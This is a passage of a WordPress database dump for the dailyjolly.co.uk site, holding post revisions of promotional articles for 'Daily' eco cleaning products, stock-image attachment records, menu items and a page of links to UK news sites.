</p>\n														\n														<p>\n                                                            The materials we use to make our products are so gentle and biodegradable you can even re-use your grey (waste) water on your garden. All we advise is that you give the bucket a couple of days to start the biodegradation process... and then splosh!\n                                                        </p>\n														<p>\n														    So far, the projects in Ethiopia have been a great success. As a result of this work, more people will have access to life-saving clean water and sanitation, and the knowledge needed to stay healthy.\n                                                        </p>\n														<p>\n                                                            You\'re already helping to keep water supplies clean by choosing Daily, but if you\'d like to help in a more hands-on way and donate to the cause, visit <a onclick=\"return t(\'offsite\', this.href);\" href=\"https://www.wateraid.org/uk/donate/ecover?id=UN0000,13/MAD,CshOth,13/MAD/23A&amp;utm_source=PartnerList&amp;utm_medium=email&amp;utm_content=Ecover&amp;utm_campaign=Corp\" target=\"_blank\">Daily\'s WaterAid website</a>.\n                                                        </p>\n														\n													</div>\n												</div>\n                          </div>\n                        </div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </form>\n</body>\n</html>','WaterAid Project','','inherit','closed','closed','','58-revision-v1','','','2017-10-17 08:52:15','2017-10-17 08:52:15','',58,'http://www.dailyjolly.co.uk/58-revision-v1',0,'revision','',0),(104,1,'2017-10-17 08:54:15','2017-10-17 08:54:15','','Twelve Apostles at sunset, Australia','People watching sunset at viewpoint by Twelve Apostles limestone rock formation, Great Ocean Road, Victoria, Australia','inherit','open','closed','','twelve-apostles-at-sunset-australia','','','2017-10-17 08:54:15','2017-10-17 08:54:15','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast.jpg',0,'attachment','image/jpeg',0),(105,1,'2017-10-17 08:54:17','2017-10-17 08:54:17','','freeimages.co.uk techonology images','','inherit','open','closed','','freeimages-co-uk-techonology-images','','','2017-10-17 08:54:17','2017-10-17 08:54:17','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/25waydconnector.jpg',0,'attachment','image/jpeg',0),(106,1,'2017-10-17 08:54:18','2017-10-17 08:54:18','','Close up detail of a roll of 35mm film','Close up detail of a roll of 35mm film viewed from a high angle showing the coils of the reel and sprockets , isolated on white','inherit','open','closed','','close-up-detail-of-a-roll-of-35mm-film','','','2017-10-17 08:54:18','2017-10-17 08:54:18','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/35mm_film-Copy-Copy.jpg',0,'attachment','image/jpeg',0),(107,1,'2017-10-17 08:54:20','2017-10-17 08:54:20','','Close up detail of a roll of 35mm film','Close up detail of a roll of 35mm film viewed from a high angle showing the coils of the reel and sprockets , isolated on white','inherit','open','closed','','close-up-detail-of-a-roll-of-35mm-film-2','','','2017-10-17 08:54:20','2017-10-17 08:54:20','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/35mm_film-Copy.jpg',0,'attachment','image/jpeg',0),(108,1,'2017-10-17 08:54:22','2017-10-17 08:54:22','','Close up detail of a roll of 35mm film','Close up detail of a roll of 35mm film viewed from a high angle showing the coils of the reel and sprockets , isolated on white','inherit','open','closed','','close-up-detail-of-a-roll-of-35mm-film-3','','','2017-10-17 08:54:22','2017-10-17 08:54:22','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/35mm_film.jpg',0,'attachment','image/jpeg',0),(109,1,'2017-10-17 08:54:25','2017-10-17 08:54:25','','Extreme close up of green and red liquid','Extreme close up of abstract background composed of thick green and red liquid with bubbles','inherit','open','closed','','extreme-close-up-of-green-and-red-liquid','','','2017-10-17 08:54:25','2017-10-17 08:54:25','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/39-bubbles10015.jpg',0,'attachment','image/jpeg',0),(110,1,'2017-10-17 08:56:36','2017-10-17 08:56:36','','Twelve Apostles at sunset, Australia','People watching sunset at viewpoint by Twelve Apostles limestone rock formation, Great Ocean Road, Victoria, Australia','inherit','open','closed','','twelve-apostles-at-sunset-australia-2','','','2017-10-17 08:56:36','2017-10-17 08:56:36','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/12_apostles_coast-1.jpg',0,'attachment','image/jpeg',0),(111,1,'2017-10-17 08:56:39','2017-10-17 08:56:39','','Three sisters rock formation, NSW, Australia','Scenic landscape view from a viewing point of the Three sisters rock formation, NSW, Australia overlooking distant valleys veiled in mist or haze','inherit','open','closed','','three-sisters-rock-formation-nsw-australia','','','2017-10-17 08:56:39','2017-10-17 08:56:39','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/40-threesisters20049.jpg',0,'attachment','image/jpeg',0),(112,1,'2017-10-17 08:56:40','2017-10-17 08:56:40','','Darling harbour, Sydney, Australia','Darling harbour, Sydney, Australia with the Prymont Bridge and buildings of the CBD in the background','inherit','open','closed','','darling-harbour-sydney-australia','','','2017-10-17 08:56:40','2017-10-17 08:56:40','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/41-darlingharbour1.jpg',0,'attachment','image/jpeg',0),(113,1,'2017-10-17 08:56:42','2017-10-17 08:56:42','','Trunk of an Australian gum tree','Trunk of an Australian gum tree, or eucalyptus, in close up detail against a clear sunny blue sky','inherit','open','closed','','trunk-of-an-australian-gum-tree','','','2017-10-17 08:56:42','2017-10-17 08:56:42','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/43-cammotree.jpg',0,'attachment','image/jpeg',0),(114,1,'2017-10-17 08:56:43','2017-10-17 08:56:43','','camp cove','a view of camp cove, sydney harbour on a sunny day','inherit','open','closed','','camp-cove','','','2017-10-17 08:56:43','2017-10-17 08:56:43','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/45-campcove.jpg',0,'attachment','image/jpeg',0),(115,1,'2017-10-17 08:56:44','2017-10-17 08:56:44','','freeimages.co.uk buildings','','inherit','open','closed','','freeimages-co-uk-buildings','','','2017-10-17 08:56:44','2017-10-17 08:56:44','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/amusmentpark2377.jpg',0,'attachment','image/jpeg',0),(116,1,'2017-10-17 08:56:46','2017-10-17 08:56:46','','freeimages.co.uk buildings','','inherit','open','closed','','freeimages-co-uk-buildings-2','','','2017-10-17 08:56:46','2017-10-17 08:56:46','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/amusmentpark2379.jpg',0,'attachment','image/jpeg',0),(117,1,'2017-10-17 08:56:47','2017-10-17 08:56:47','','freeimages.co.uk buildings','','inherit','open','closed','','freeimages-co-uk-buildings-3','','','2017-10-17 08:56:47','2017-10-17 08:56:47','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/amusmentpark2380.jpg',0,'attachment','image/jpeg',0),(118,1,'2017-10-17 08:56:48','2017-10-17 08:56:48','','freeimages.co.uk buildings','','inherit','open','closed','','freeimages-co-uk-buildings-4','','','2017-10-17 08:56:48','2017-10-17 08:56:48','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/amusmentpark2381.jpg',0,'attachment','image/jpeg',0),(119,1,'2017-10-17 08:56:49','2017-10-17 08:56:49','','freeimages.co.uk buildings','','inherit','open','closed','','freeimages-co-uk-buildings-5','','','2017-10-17 08:56:49','2017-10-17 08:56:49','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/amusmentpark2385.jpg',0,'attachment','image/jpeg',0),(120,1,'2017-10-17 08:56:50','2017-10-17 08:56:50','','Layers of blue wrapping paper as background','Layers of simple wrinkled blue wrapping paper as abstract background with copy space','inherit','open','closed','','layers-of-blue-wrapping-paper-as-background','','','2017-10-17 08:56:50','2017-10-17 08:56:50','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper0650.jpg',0,'attachment','image/jpeg',0),(121,1,'2017-10-17 08:56:51','2017-10-17 08:56:51','','Extreme close up of wrinkled periwinkle paper','Extreme close up of wrinkled periwinkle paper creating an abstract background','inherit','open','closed','','extreme-close-up-of-wrinkled-periwinkle-paper','','','2017-10-17 08:56:51','2017-10-17 08:56:51','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper0655.jpg',0,'attachment','image/jpeg',0),(122,1,'2017-10-17 08:56:52','2017-10-17 08:56:52','','Background of wrinkled paper in white color','Detailed background of wrinkled paper in white neutral color with rough texture with copy space','inherit','open','closed','','background-of-wrinkled-paper-in-white-color','','','2017-10-17 08:56:52','2017-10-17 08:56:52','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1416.jpg',0,'attachment','image/jpeg',0),(123,1,'2017-10-17 08:56:54','2017-10-17 08:56:54','','Sheet of wrinkled wrapping paper as background','Single layer of simple wrinkled brown wrapping paper as abstract background with copy space','inherit','open','closed','','sheet-of-wrinkled-wrapping-paper-as-background','','','2017-10-17 08:56:54','2017-10-17 08:56:54','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1419.jpg',0,'attachment','image/jpeg',0),(124,1,'2017-10-17 08:56:59','2017-10-17 08:56:59','','Extreme close up of crumpled waxy brown paper','Extreme close up of crumpled waxy brown paper with highlights from overhead light source','inherit','open','closed','','extreme-close-up-of-crumpled-waxy-brown-paper','','','2017-10-17 08:56:59','2017-10-17 08:56:59','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/backgroundpaper1449.jpg',0,'attachment','image/jpeg',0),(125,1,'2017-10-17 08:57:00','2017-10-17 08:57:00','','english chaffinch','a chaffinch eating crumbs left on a picnic table','inherit','open','closed','','english-chaffinch','','','2017-10-17 08:57:00','2017-10-17 08:57:00','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/bird4550.jpg',0,'attachment','image/jpeg',0),(126,1,'2017-10-17 08:57:02','2017-10-17 08:57:02','','Empty Straw Nest','Empty straw nest on a yellow background.','inherit','open','closed','','empty-straw-nest','','','2017-10-17 08:57:02','2017-10-17 08:57:02','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/birds_nest.jpg',0,'attachment','image/jpeg',0),(127,1,'2017-10-17 08:57:05','2017-10-17 08:57:05','','Birds sitting on overhead cables','Small flock of birds sitting perched on overhead cables against a blue sky with copyspace','inherit','open','closed','','birds-sitting-on-overhead-cables','','','2017-10-17 08:57:05','2017-10-17 08:57:05','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/birds_on_wire.jpg',0,'attachment','image/jpeg',0),(128,1,'2017-10-17 08:57:07','2017-10-17 08:57:07','','Black and white lemur','Black and white lemur climbing a tree looking away from the camera with copyspace','inherit','open','closed','','black-and-white-lemur','','','2017-10-17 08:57:07','2017-10-17 08:57:07','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/black_and_white_lemur.jpg',0,'attachment','image/jpeg',0),(129,1,'2017-10-17 08:57:10','2017-10-17 08:57:10','','urban skyline','a generic looking urban skyline aerial view','inherit','open','closed','','urban-skyline','','','2017-10-17 08:57:10','2017-10-17 08:57:10','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00029p.jpg',0,'attachment','image/jpeg',0),(130,1,'2017-10-17 08:57:12','2017-10-17 08:57:12','','freeimages.co.uk buildings','','inherit','open','closed','','freeimages-co-uk-buildings-6','','','2017-10-17 08:57:12','2017-10-17 08:57:12','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00030p.jpg',0,'attachment','image/jpeg',0),(131,1,'2017-10-17 08:57:14','2017-10-17 08:57:14','','olympic pool','looking down on the monteal olympic pool / bio dome','inherit','open','closed','','olympic-pool','','','2017-10-17 08:57:14','2017-10-17 08:57:14','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00033p.jpg',0,'attachment','image/jpeg',0),(132,1,'2017-10-17 08:57:16','2017-10-17 08:57:16','','toronto skyline','an old photo of the tall buildings of central toronto','inherit','open','closed','','toronto-skyline','','','2017-10-17 08:57:16','2017-10-17 08:57:16','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/building00034p.jpg',0,'attachment','image/jpeg',0),(133,1,'2017-10-17 08:57:18','2017-10-17 08:57:18','','block of flats','a block of flats overlooking the river trent, nottingham uk','inherit','open','closed','','block-of-flats','','','2017-10-17 08:57:18','2017-10-17 08:57:18','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/buildings04090071.jpg',0,'attachment','image/jpeg',0),(134,1,'2017-10-17 08:57:20','2017-10-17 08:57:20','','nottingham playhouse','modern nottingham architecture','inherit','open','closed','','nottingham-playhouse','','','2017-10-17 08:57:20','2017-10-17 08:57:20','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/buildingsconstruction0871.jpg',0,'attachment','image/jpeg',0),(135,1,'2017-10-17 08:57:23','2017-10-17 08:57:23','','Pink Finger Coral','colourful pink finger coral and a shoals of reef fish','inherit','open','closed','','pink-finger-coral','','','2017-10-17 08:57:23','2017-10-17 08:57:23','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/coral_and_reef_fish_2739.jpg',0,'attachment','image/jpeg',0),(136,1,'2017-10-17 08:57:25','2017-10-17 08:57:25','','Reef Fish','an assortment of corals and reef fish','inherit','open','closed','','reef-fish','','','2017-10-17 08:57:25','2017-10-17 08:57:25','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/coral_barrier_reef_2712.jpg',0,'attachment','image/jpeg',0),(137,1,'2017-10-17 08:57:28','2017-10-17 08:57:28','','Coral Plates','Somewhere between the sacred silence and sleep','inherit','open','closed','','coral-plates','','','2017-10-17 08:57:28','2017-10-17 08:57:28','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/coral_ecosystem_2763.jpg',0,'attachment','image/jpeg',0),(138,1,'2017-10-17 08:57:30','2017-10-17 08:57:30','','Reef Fish','an assortment of corals and yellow reef fish','inherit','open','closed','','reef-fish-2','','','2017-10-17 08:57:30','2017-10-17 08:57:30','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/corals_and_reef_fish2735.jpg',0,'attachment','image/jpeg',0),(139,1,'2017-10-17 08:57:32','2017-10-17 08:57:32','','Corporate office block','Tilted angle view of modern corporate office block skyscraper with multiple windows against a cloudy blue sky','inherit','open','closed','','corporate-office-block','','','2017-10-17 08:57:32','2017-10-17 08:57:32','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/corporate_office_block.jpg',0,'attachment','image/jpeg',0),(140,1,'2017-10-17 08:57:34','2017-10-17 08:57:34','','Hard Coral Macro','Coral of the Faviidae family, Genus Cyphastrea agassizi','inherit','open','closed','','hard-coral-macro','','','2017-10-17 08:57:34','2017-10-17 08:57:34','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/Cyphastrea_3385.jpg',0,'attachment','image/jpeg',0),(141,1,'2017-10-17 08:57:36','2017-10-17 08:57:36','','Flowering Yellow Daffodils','Background of flowering yellow daffodils in spring amongst green grass in woodland.','inherit','open','closed','','flowering-yellow-daffodils','','','2017-10-17 08:57:36','2017-10-17 08:57:36','',0,'http://www.dailyjolly.co.uk/wp-content/uploads/2017/10/daffodils.jpg',0,'attachment','image/jpeg',0),(142,1,'2017-10-17 08:58:00','2017-10-17 08:58:00','\r\n<h2 class=\"title\">Daily\'s cleaner, greener travel tips</h2>\r\nWhether you\'re planning a camping trip here in Blighty or are jetting off to a tropical beach, having some handy laundry tips up your sleeve means you can pack lighter and look fresher all holiday long. And you\'ll have more room for more pressies.\r\n<ol>\r\n 	<li><strong>Plan your wardrobe well</strong> - lighter, wrinkle resistant clothes generally dry faster and shouldn\'t need an iron. Think layers. That way you can get away with just washing the inner layers when they need it.</li>\r\n 	<li><strong>Bring what you need</strong> - pour some of your <a href=\"http://www.ecoverdirect.com/products/delicate-laundry-liquid-500ml/edelicate500ml.aspx?productid=edelicate500ml\" target=\"_blank\" rel=\"noopener\">Daily Delicate laundry detergent</a> into a travel bottle. It\'s gentle on you when handwashing and a little goes a long way. And a length of cord can make a great washing line.</li>\r\n 	<li><strong>Think ahead</strong> - plan your laundry drying times so that you don\'t end up having to wear or pack damp clothes.</li>\r\n 	<li><strong>The creative washing line</strong> - bed frames, towel rails, shower rails, balcony chairs and good old clothes hangers are all great options for hanging things up to dry in hotels. Guy ropes, car door frames and cleverly rigged up tent-to-car lines are good camp options. Check out how much drying space you have before you start washing.</li>\r\n 	<li><strong>Use shower power</strong> - smaller items can get a good wash on the shower floor while you soap up. Just rinse in the sink afterwards.</li>\r\n 	<li><strong>Squeeze, don\'t wring</strong> - after washing and rinsing your clothes, squeeze out the water, rather than wringing. It will help your clothes keep their shape better.</li>\r\n 	<li><strong>Towel dry</strong> - we find the best way to get the most water out and avoid dripping is to roll them in a towel. Simply lay the item on a flat towel. Then roll it up from one end and squeeze the whole thing tightly.</li>\r\n 	<li><strong>Hang \'em up</strong> - leave space between the clothes so they dry faster. If you\'re indoors and you can leave a window open, even better.</li>\r\n 	<li><strong>Not quite dry?</strong> You could leave it hanging for another day, finish it off with an iron if you have one or just wear it anyway and let your body heat dry it.</li>\r\n 	<li><strong>Freshen yourself with Daily</strong> - our <a href=\"http://www.ecoverdirect.com/products/mizu-body-wash-250ml/emizshow250ml.aspx?productid=emizshow250ml\" target=\"_blank\" rel=\"noopener\">Mizu body washes</a> and <a href=\"http://www.ecoverdirect.com/products/mizu-body-lotion---normal-skin/emizlothydrat.aspx?productid=emizlothydrat\" target=\"_blank\" rel=\"noopener\">lotions</a> are made from plant based ingredients, making them kinder to you, your family and nature. The perfect holiday companions!</li>\r\n','Travel Hints and Tips','Ecover\'s advice for staying cleaner and greener, on your holidays.','inherit','closed','closed','','57-revision-v1','','','2017-10-17 08:58:00','2017-10-17 08:58:00','',57,'http://www.dailyjolly.co.uk/57-revision-v1',0,'revision','',0),(147,1,'2017-10-17 09:06:44','2017-10-17 09:06:44','We have recommended some of the best news websites online which all cover a range of topics. See below if you want to check them out.\n<table width=\"190\">\n<tbody>\n<tr>\n<td width=\"190\"><a href=\"http://argus-btn.co.uk/\">argus-btn.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://kingsfieldpublications.co.uk/\">kingsfieldpublications.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://iraqcrisis.co.uk/\">iraqcrisis.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://iraqcrisis.co.uk/\">iraqcrisis.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://adauk.org.uk/\">adauk.org.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://oat.org.uk/\">oat.org.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://liveattheinstitute.co.uk/\">liveattheinstitute.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://gocscotland.org.uk/\">gocscotland.org.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://westlothiannews.co.uk/\">westlothiannews.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://wimps.org.uk/\">wimps.org.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://yuonline.co.uk/\">yuonline.co.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://wikiville.org.uk/\">wikiville.org.uk</a></td>\n</tr>\n<tr>\n<td><a href=\"http://headlines-today.co.uk/\">headlines-today.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://myentertainmentnews.co.uk/\">myentertainmentnews.co.uk </a></td>\n</tr>\n<tr>\n<td><a href=\"http://injournalism.co.uk/\">injournalism.co.uk </a></td>\n</tr>\n</tbody>\n</table>','Can you Find it - Business © 2017','','inherit','closed','closed','','24-autosave-v1','','','2017-10-17 09:06:44','2017-10-17 09:06:44','',24,'http://www.dailyjolly.co.uk/24-autosave-v1',0,'revision','',0),(148,1,'2017-10-17 09:07:38','2017-10-17 09:07:38','We have recommended some of the best news websites online which all cover a range of topics. See below if you want to check them out.\r\n<table width=\"190\">\r\n<tbody>\r\n<tr>\r\n<td width=\"190\"><a href=\"http://argus-btn.co.uk/\">argus-btn</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://kingsfieldpublications.co.uk/\">kingsfieldpublications</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://iraqcrisis.co.uk/\">iraqcrisis</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://adauk.org.uk/\">adauk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://oat.org.uk/\">oat</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://liveattheinstitute.co.uk/\">liveattheinstitute</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://gocscotland.org.uk/\">gocscotland</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://westlothiannews.co.uk/\">westlothiannews</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://wimps.org.uk/\">wimps</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://yuonline.co.uk/\">yuonline</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://wikiville.org.uk/\">wikiville</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://headlines-today.co.uk/\">headlines-today</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://myentertainmentnews.co.uk/\">myentertainmentnews</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://injournalism.co.uk/\">injournalism</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','Can you Find it - Business © 2017','The Can you Find it - Business is a monthly Business to Business publication published by the Headline History. Every month in excess of 16,000 copies are sent out by direct mail and picked up through our network of county wide distribution points. Including 120 training agencies, 80 councillors, Whitehall and Brussels. The Can you Find it - Business is distributed throughout London, Sussex, North and Central Lancs and all companies in this area. We offer businesses a number of different opportunities to take full advantage of the marketing potential within the Can you find it - Business Edition.','inherit','closed','closed','','24-revision-v1','','','2017-10-17 09:07:38','2017-10-17 09:07:38','',24,'http://www.dailyjolly.co.uk/24-revision-v1',0,'revision','',0),(149,1,'2017-10-17 09:08:05','2017-10-17 09:08:05','We have recommended some of the best news websites online which all cover a range of topics. See below if you want to check them out.\r\n<table width=\"190\">\r\n<tbody>\r\n<tr>\r\n<td width=\"190\"><a href=\"http://argus-btn.co.uk/\">argus-btn</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://kingsfieldpublications.co.uk/\">kingsfieldpublications</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://iraqcrisis.co.uk/\">iraqcrisis</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://adauk.org.uk/\">adauk</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://oat.org.uk/\">oat</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://liveattheinstitute.co.uk/\">liveattheinstitute</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://gocscotland.org.uk/\">gocscotland</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://westlothiannews.co.uk/\">westlothiannews</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://wimps.org.uk/\">wimps</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://yuonline.co.uk/\">yuonline</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://wikiville.org.uk/\">wikiville</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://headlines-today.co.uk/\">headlines-today</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://myentertainmentnews.co.uk/\">myentertainmentnews</a></td>\r\n</tr>\r\n<tr>\r\n<td><a href=\"http://injournalism.co.uk/\">injournalism</a></td>\r\n</tr>\r\n</tbody>\r\n</table>','Can you Find it - Business Links!','The Can you Find it - Business is a monthly Business to Business publication published by the Headline History. Every month in excess of 16,000 copies are sent out by direct mail and picked up through our network of county wide distribution points. Including 120 training agencies, 80 councillors, Whitehall and Brussels. The Can you Find it - Business is distributed throughout London, Sussex, North and Central Lancs and all companies in this area. We offer businesses a number of different opportunities to take full advantage of the marketing potential within the Can you find it - Business Edition.','inherit','closed','closed','','24-revision-v1','','','2017-10-17 09:08:05','2017-10-17 09:08:05','',24,'http://www.dailyjolly.co.uk/24-revision-v1',0,'revision','',0),(151,1,'2017-10-17 09:09:58','2017-10-17 09:09:58','','Home','','publish','closed','closed','','home','','','2017-10-17 09:09:58','2017-10-17 09:09:58','',0,'http://www.dailyjolly.co.uk/home',1,'nav_menu_item','',0),(152,1,'2017-10-17 09:09:59','2017-10-17 09:09:59','','Business Links','','publish','closed','closed','','business-links','','','2017-10-17 09:10:19','2017-10-17 09:10:19','',0,'http://www.dailyjolly.co.uk/business-links',8,'nav_menu_item','',0),(153,1,'2017-10-17 09:09:59','2017-10-17 09:09:59','','Training','','publish','closed','closed','','training','','','2017-10-17 09:09:59','2017-10-17 09:09:59','',0,'http://www.dailyjolly.co.uk/training',2,'nav_menu_item','',0),(154,1,'2017-10-17 09:10:00','2017-10-17 09:10:00','','Eden Project','','publish','closed','closed','','eden-project','','','2017-10-17 09:10:00','2017-10-17 09:10:00','',0,'http://www.dailyjolly.co.uk/eden-project',3,'nav_menu_item','',0),(155,1,'2017-10-17 09:10:00','2017-10-17 09:10:00','','Cleaning Products','','publish','closed','closed','','cleaning-products','','','2017-11-10 12:19:37','2017-11-10 12:19:37','',0,'http://www.dailyjolly.co.uk/cleaning-products',4,'nav_menu_item','',0),(156,1,'2017-10-17 09:10:01','2017-10-17 09:10:01','','Festivals','','publish','closed','closed','','festivals','','','2017-10-17 09:10:01','2017-10-17 09:10:01','',0,'http://www.dailyjolly.co.uk/festivals',5,'nav_menu_item','',0),(157,1,'2017-10-17 09:10:01','2017-10-17 09:10:01','','Factories','','publish','closed','closed','','factories','','','2017-10-17 09:10:01','2017-10-17 09:10:01','',0,'http://www.dailyjolly.co.uk/factories',7,'nav_menu_item','',0),(159,1,'2017-10-17 09:10:19','2017-10-17 09:10:19','','Values','','publish','closed','closed','','values','','','2017-10-17 09:10:19','2017-10-17 09:10:19','',0,'http://www.dailyjolly.co.uk/values',7,'nav_menu_item','',0),(160,1,'2017-10-23 10:09:36','2017-10-23 10:09:36','<h1>What should you be thinking about when cleaning the toilet?</h1>\r\n<strong>Did you know <a href=\"http://www.ecoverdirect.com/products/toilet-cleaner---pine-fresh/etoiletpf750ml.aspx?productid=etoiletpf750ml\">Daily Toilet Cleaner</a> is 10 times less toxic than many of the leading brands?</strong>\r\n\r\n<strong>But what does that actually mean you ask?</strong>\r\n\r\nThese ingredients are carefully selected against very strict criteria and one area that we take seriously is the \'aquatic toxicity\' of cleaning products, because we believe water is life. <a href=\"http://devoncornwallproperty.co.uk/cleaning-and-stain-removal-tips/cleaning-and-stain-removal-tips.html\" target=\"_blank\" rel=\"noopener\">Click here</a> for cleaning tips.\r\n\r\nNow here\'s the geeky bit - aquatic toxicity is measured by Critical Dilution Volume or CDV as we call it. CDV measures how much water it takes to neutralise each dose of a product.\r\n\r\nThe lower the \'CDV\', means the lower the aquatic toxicity, which results in a healthier environment for all of the fishes. All of that, plus a fresh and clean toilet, now that really is Feel Good Cleaning. <a href=\"http://peaawards.co.uk/celebrate-a-green-living\" target=\"_blank\" rel=\"noopener\">Find out about green products</a>.\r\n<h2>Wonder if any other leading brands measure their CDV?</h2>\r\nWe can always get better though and it has always been our mission to be at the <a href=\"../../message-in-our-bottle/\">cutting edge of sustainability</a>, which means even lower CDV.\r\n\r\nIf you think that was an eye opener, have you seen our <a href=\"../../articles/factory-facts/\">ecological factories</a>?\r\n<h2>Office cleaning suited to your working hours</h2>\r\nOffice cleaning agencies will also use the best products to stick with being environmentally friendly, as well as ensuring the best for their clients. When looking for an agency best suited to your needs, including office hours and services, it is recommend that you ask these questions so you know what your agency can offer you.\r\n\r\nOffice cleaners should be professional, uniformed and trained to meet health and safety regulations as well as cleaning standards.\r\n\r\n<strong>If you\'re based in the Sussex area, such as Brighton, Hove and Worthing get in touch with Smart Clean at <a href=\"mailto:admin@smartcleanservices.co.uk\">admin@smartcleanservices.co.uk</a>. </strong>\r\n\r\nThe team at Smart Clean ensure that all staff completes work to the highest standard and within regulations. With over 30 years of experience in the industry, you are sure to have a service that leaves your office looking brand new. <a href=\"http://www.smartcleanservices.co.uk/cleaners.htm\" target=\"_blank\" rel=\"noopener\">Meet the team here</a>.','What should you be thinking about when cleaning the toilet?','Did you know  Toilet Cleaner is 10 times less toxic than many of the leading brands? But what does that actually mean you ask?','inherit','closed','closed','','33-revision-v1','','','2017-10-23 10:09:36','2017-10-23 10:09:36','',33,'http://www.dailyjolly.co.uk/33-revision-v1',0,'revision','',0),(161,1,'2017-10-23 10:10:04','2017-10-23 10:10:04','<h1>What should you be thinking about when cleaning the toilet?</h1>\r\n<strong>Did you know Daily Toilet Cleaner is 10 times less toxic than many of the leading brands?</strong>\r\n\r\n<strong>But what does that actually mean you ask?</strong>\r\n\r\nThese ingredients are carefully selected against very strict criteria and one area that we take seriously is the \'aquatic toxicity\' of cleaning products, because we believe water is life. <a href=\"http://devoncornwallproperty.co.uk/cleaning-and-stain-removal-tips/cleaning-and-stain-removal-tips.html\" target=\"_blank\" rel=\"noopener\">Click here</a> for cleaning tips.\r\n\r\nNow here\'s the geeky bit - aquatic toxicity is measured by Critical Dilution Volume or CDV as we call it. CDV measures how much water it takes to neutralise each dose of a product.\r\n\r\nThe lower the \'CDV\', means the lower the aquatic toxicity, which results in a healthier environment for all of the fishes. All of that, plus a fresh and clean toilet, now that really is Feel Good Cleaning. <a href=\"http://peaawards.co.uk/celebrate-a-green-living\" target=\"_blank\" rel=\"noopener\">Find out about green products</a>.\r\n<h2>Wonder if any other leading brands measure their CDV?</h2>\r\nWe can always get better though and it has always been our mission to be at the <a href=\"../../message-in-our-bottle/\">cutting edge of sustainability</a>, which means even lower 